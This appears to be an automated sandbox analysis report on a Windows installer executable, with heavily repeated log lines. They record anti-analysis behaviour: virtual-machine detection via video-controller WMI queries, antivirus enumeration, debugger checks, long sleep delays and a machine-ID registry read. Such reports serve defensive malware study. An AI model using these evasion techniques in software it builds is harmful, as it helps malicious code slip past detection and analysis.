Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Memory allocated: 3B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Memory allocated: 3D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Memory allocated: 5D50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Window / User API: threadDelayed 3552			Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Window / User API: threadDelayed 6245			Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-19805

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 2216	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 2216	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 964	Thread sleep count: 3552 > 30	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe TID: 964	Thread sleep count: 6245 > 30	Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.0000000001407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

API call chain: ExitProcess graph end node

graph_0-19807

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A165D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00A165D1

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

0_2_00A240E4

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_03AE1628 mov eax, dword ptr fs:[00000030h]

0_2_03AE1628

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A27CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00A27CB1

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A165D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00A165D1
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A1C78D SetUnhandledExceptionFilter,	0_2_00A1C78D
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: 0_2_00A1A792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A1A792

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A11671 cpuid

0_2_00A11671

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00A1F895
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00A1E04E
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: GetLocaleInfoA,	0_2_00A24859
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00A1F9BC
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00A1F9F8
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00A1F955
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00A1ECAA
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00A244BA
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00A1F4CD
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_00A1DC2B
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00A24594
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00A1F5C2
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00A1F6C4
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00A1F669
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00A1EF98
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00A15FC5

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Code function: 0_2_00A141BA GetSystemTimeAsFileTime,__aulldiv,

0_2_00A141BA

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s Defender\MsMpeng.exe
Source: 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013F9000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3872830972.00000000063C1000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3872830972.0000000006390000.00000004.00000020.00020000.00000000.sdmp, 998_popxinv_Installer.exe, 00000000.00000002.3869480227.0000000001468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
